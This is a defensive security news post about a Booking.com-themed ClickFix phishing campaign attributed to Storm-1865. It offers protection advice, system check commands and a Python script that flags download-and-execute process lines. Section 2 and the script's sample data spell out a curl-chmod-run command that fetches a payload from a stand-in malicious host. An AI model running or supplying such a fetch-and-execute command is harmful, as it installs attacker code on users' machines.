Phishing Campaign Impersonates Booking.com, Delivers Credential-Stealing Malware


Microsoft Threat Intelligence has identified a phishing campaign impersonating the travel site Booking.com, delivering credential-stealing malware used for fraud and theft. The campaign, attributed to the cybercrime actor Storm-1865, targets individuals in hospitality organizations. It employs a social engineering technique called ClickFix, tricking recipients into copying, pasting, and launching commands to download a malware payload.

You Should Know:

1. How the Attack Works:

  • The phishing emails impersonate Booking.com and target hospitality professionals.
  • The emails contain a fake CAPTCHA message prompting users to use a keyboard shortcut to launch a command.
  • The command downloads a malware payload designed to steal credentials.

2. Commands to Avoid:

  • Be cautious of commands like `curl` or `wget` that download files from unknown sources.
  • Example of a malicious command:
    curl -o payload.sh http://malicious-site.com/payload.sh && chmod +x payload.sh && ./payload.sh
    
  • This command downloads a script, makes it executable, and runs it, potentially compromising your system.

3. Protection Steps:

  • Verify Email Sources: Always verify the sender’s email address and look for signs of phishing.
  • Avoid Copy-Pasting Commands: Do not copy and paste commands from unsolicited emails.
  • Use Antivirus Software: Ensure your system has updated antivirus software to detect and block malware.
  • Enable Multi-Factor Authentication (MFA): MFA adds an extra layer of security, making it harder for attackers to gain access even if they steal credentials.

4. Linux Commands for Security:

  • Check for Suspicious Processes:
    ps aux | grep -iE 'payload|malware' | grep -v grep
    
  • Monitor Network Connections:
    netstat -tuln
    
  • Scan for Malware with ClamAV:
    sudo apt-get install clamav
    sudo freshclam
    sudo clamscan -r /home
    

5. Windows Commands for Security:

  • Check for Malicious Services:
    sc query state= all
    
  • Monitor Network Activity:
    netstat -ano
    
  • Scan for Malware with Windows Defender:
    mpcmdrun -Scan -ScanType 2
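As an added example (not part of the original post or of Microsoft's report), the script below applies the section 4 and 5 checks programmatically: it reads `ps aux`-style output and flags command lines with the ClickFix shape described in section 2, a downloader fetching a URL chained straight into execution, while letting an ordinary download through. The process listing, PIDs and the `malicious-site.example` host are constructed sample data.

```python
import re

# ClickFix lures get the victim to paste a command that fetches a payload and runs it
# at once. These patterns describe that download-and-execute shape: the Linux form in
# this post (curl/wget + chmod +x + ./) and common Windows downloaders.
DOWNLOADERS = re.compile(r"\b(curl|wget|mshta|certutil|bitsadmin|Invoke-WebRequest|iwr|irm|iex)\b", re.I)
CHAINING = re.compile(r"(&&|\|\s*(sh|bash|powershell|cmd)\b|;\s*\./|chmod\s+\+x)", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
KEYWORDS = re.compile(r"payload|malware", re.I)  # the section 4 terms, with working alternation

def score_command(cmdline: str) -> list[str]:
    """Return the reasons a command line looks like a ClickFix-style download-and-execute chain."""
    reasons = []
    if DOWNLOADERS.search(cmdline) and URL.search(cmdline):
        reasons.append("downloader+url")
    if CHAINING.search(cmdline):
        reasons.append("chained-execution")
    if KEYWORDS.search(cmdline):
        reasons.append("keyword")
    return reasons

def flag_process_lines(ps_lines):
    """Scan `ps aux`-style lines and return (pid, reasons, cmdline) for suspicious processes."""
    hits = []
    for line in ps_lines:
        fields = line.split(None, 10)  # ps aux prints 11 columns; the last is the full command
        if len(fields) < 11 or not fields[1].isdigit():
            continue  # header or malformed line
        pid, cmd = int(fields[1]), fields[10]
        if cmd.split()[0].endswith("grep"):
            continue  # the grep from section 4 would otherwise match itself
        reasons = score_command(cmd)
        # A lone download or a lone && chain is routine admin work; the pairing is the tell.
        if ("downloader+url" in reasons and "chained-execution" in reasons) or "keyword" in reasons:
            hits.append((pid, reasons, cmd))
    return hits

# Constructed sample listing modelled on the post's example command; not real telemetry.
SAMPLE_PS = """USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 168000 11000 ? Ss 09:00 0:01 /sbin/init
alice 2311 0.0 0.2 25000 9000 pts/0 Ss 09:05 0:00 bash
alice 2402 1.2 0.3 40000 12000 pts/0 S 09:06 0:00 sh -c curl -o payload.sh http://malicious-site.example/payload.sh && chmod +x payload.sh && ./payload.sh
alice 2410 0.0 0.1 20000 5000 pts/0 S 09:06 0:00 curl -sS https://deb.debian.org/debian/dists/stable/InRelease
alice 2415 0.0 0.0 10000 2000 pts/1 S+ 09:07 0:00 grep -iE payload|malware
""".splitlines()

if __name__ == "__main__":
    for pid, reasons, cmd in flag_process_lines(SAMPLE_PS):
        print(f"PID {pid}: {', '.join(reasons)} :: {cmd}")
```

Only PID 2402 is reported; the plain package-index download on PID 2410 and the detection grep itself are left alone.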
    

What Undercode Say:

Phishing campaigns like the one targeting Booking.com users are becoming increasingly sophisticated, leveraging social engineering techniques to exploit human tendencies. It’s crucial to stay vigilant and adopt best practices for cybersecurity. Always verify the authenticity of emails, avoid executing unknown commands, and use security tools to protect your systems. By following these steps, you can significantly reduce the risk of falling victim to such attacks.

For more detailed analysis and protection recommendations, refer to the Microsoft Threat Intelligence Blog.

References:

Reported By: Jeremydallman Phishing – Hackers Feeds